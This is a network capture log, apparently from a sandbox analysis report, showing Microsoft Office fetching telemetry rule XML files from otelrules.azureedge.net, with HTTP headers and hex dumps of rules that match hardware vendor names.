                                                                                                                                                                                                                                              2024-11-02 06:15:57 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              16192.168.2.46373213.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:58 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 469
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                              x-ms-request-id: 6df06080-e01e-001f-1d30-2c1633000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061558Z-176bd8f9bc598x8vhC1DFWq73s00000001xg000000008fqf
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              17192.168.2.46373313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:58 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                              x-ms-request-id: 12fa9963-101e-000b-2608-2c5e5c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061558Z-16dc884887bvg6x5hC1DFW86ag00000001qg000000004yr4
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              18192.168.2.46373513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:58 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 464
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                              x-ms-request-id: 634471bf-901e-0016-1230-2cefe9000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061558Z-16ccfc49897w6rdhhC1DFWb10w00000001pg0000000074y0
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              19192.168.2.46373413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:58 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 477
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                              x-ms-request-id: c6ea79c0-701e-0050-6324-2c6767000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061558Z-176bd8f9bc5fvjnbhC1DFW9ez800000001kg00000000abcu
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              20192.168.2.46373613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:58 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                              x-ms-request-id: 138356e5-101e-0046-15fe-2b91b0000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061558Z-176bd8f9bc5pzj8phC1DFWsz3000000001r0000000003ddx
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:58 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              21192.168.2.46373813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 472
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                              x-ms-request-id: 8644ae90-c01e-00a1-60bf-2b7e4a000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061559Z-16dc884887bj94q5hC1DFW11e400000001mg000000004mvh
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              22192.168.2.46373713.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                              x-ms-request-id: 406e0a0b-a01e-0084-59cd-2b9ccd000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061559Z-16ccfc4989782hnrhC1DFW2nks00000000tg000000008xck
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              23192.168.2.46373913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 404
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                                                                                              x-ms-request-id: 2b2f5229-601e-003e-5308-2c3248000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061559Z-16ccfc49897w6rdhhC1DFWb10w00000001m000000000es1e
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              24192.168.2.46374013.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:15:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:15:59 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                              x-ms-request-id: 4632b172-e01e-0071-11da-2b08e7000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061559Z-16dc884887b5dxtghC1DFW9q7c00000001vg00000000123b
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
